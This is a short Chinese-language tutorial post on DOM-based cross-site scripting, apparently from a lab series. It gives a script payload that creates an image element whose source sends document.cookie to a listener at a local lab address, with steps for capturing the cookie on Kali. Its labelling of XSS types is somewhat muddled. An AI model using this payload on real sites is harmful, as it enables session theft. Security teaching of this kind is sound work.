二十五、XSS跨站攻击-(5)DOM型跨站
2017-12-15 本文已影响0人
cybeyond
目录
1.简介
2.利用DOM型xss获取cookie
1、简介
DOM型xss是一套JS和其他语言可调用的标准的API,即利用JavaScript跨平台的特性,通过调用DOM提供的相应接口执行相关功能。
图例
2、利用DOM型xss获取cookie
在“xss reflected”中测试存储型xss,在输入框中写入如下内容:
<script>var img=document.createElement("img");img.src="http://192.168.50.115:88/log?"+escape(document.cookie);</script>
//创建一个页面元素为img,其来源为src的地址
在kali上开启监听,然后点击提交,可以查看到cookie信息
查看监听结果